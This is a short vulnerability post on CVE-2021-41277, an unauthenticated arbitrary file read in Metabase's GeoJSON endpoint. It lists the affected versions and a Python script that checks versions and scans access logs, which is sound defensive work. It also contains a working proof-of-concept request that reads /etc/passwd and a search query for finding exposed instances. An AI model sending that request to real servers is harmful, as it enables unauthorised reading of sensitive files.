Metabase geojson arbitrary file reading vulnerability CVE-2021-41277

Vulnerability Description

In the affected versions, the custom GeoJSON map operation (Admin -> Settings -> Maps -> Custom Maps -> Add a map) is exposed through the /api/geojson endpoint without permission checks, and the user-supplied url parameter is fetched without restricting the URL scheme. An unauthenticated attacker can therefore pass a file: URL and read arbitrary files from the server, obtaining sensitive information.

Vulnerability Impact

Metabase version < 0.40.5

Metabase version >= 1.0.0 and < 1.40.5

Asset search (cyberspace mapping) query

app="metabase"

Vulnerability reproduction

[Screenshot: Metabase login page]

Verify the PoC

Request the following path on the target instance; a vulnerable version returns the contents of the local file instead of a GeoJSON document:

/api/geojson?url=file:/etc/passwd
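As an added defender-side example (not from the original post, and not Metabase's own code), the following Python check does two things the advisory supports: it tests whether a reported Metabase version falls inside the affected ranges above, and it scans web server access logs for requests to /api/geojson whose url parameter uses a non-http(s) scheme such as file:. The log lines and the Combined-style log format are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Affected ranges as stated in the advisory: [lower, upper) tuples.
AFFECTED = [((0, 0, 0), (0, 40, 5)), ((1, 0, 0), (1, 40, 5))]


def parse_version(v):
    """Turn '0.40.4' or 'v1.40.5' into a comparable tuple of ints."""
    return tuple(int(x) for x in v.strip().lstrip("v").split("."))


def is_affected_version(v):
    t = parse_version(v)
    return any(lo <= t < hi for lo, hi in AFFECTED)


# Constructed Combined-log regex: client IP, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def flag_geojson_request(line):
    """Return a finding dict for a suspicious /api/geojson request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    parsed = urlparse(target)
    if parsed.path != "/api/geojson":
        return None
    for u in parse_qs(parsed.query).get("url", []):
        # parse_qs already decodes once; a second unquote catches double encoding.
        scheme = urlparse(unquote(u)).scheme.lower()
        if scheme not in ("http", "https"):  # file:, jar:, ftp:, ... are all suspect
            return {"ip": ip, "status": int(status), "scheme": scheme, "url": unquote(u)}
    return None


def scan(lines):
    return [f for f in (flag_geojson_request(l) for l in lines) if f]


# Constructed sample log lines: one PoC hit, one legitimate map, one unrelated call.
LOGS = [
    '10.0.0.5 - - [10/Nov/2021:10:01:02 +0000] "GET /api/geojson?url=file:/etc/passwd HTTP/1.1" 200 1234',
    '10.0.0.5 - - [10/Nov/2021:10:01:03 +0000] "GET /api/geojson?url=https%3A%2F%2Fexample.org%2Fus.json HTTP/1.1" 200 5678',
    '10.0.0.7 - - [10/Nov/2021:10:01:04 +0000] "GET /api/card/1 HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    print(is_affected_version("0.40.4"), is_affected_version("1.40.5"))
    print(scan(LOGS))
```

A status of 200 on a flagged line means the fetch succeeded, which on an unpatched instance indicates the file contents were returned.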

[Screenshot: PoC response]

This post is licensed under CC BY 4.0 by the author.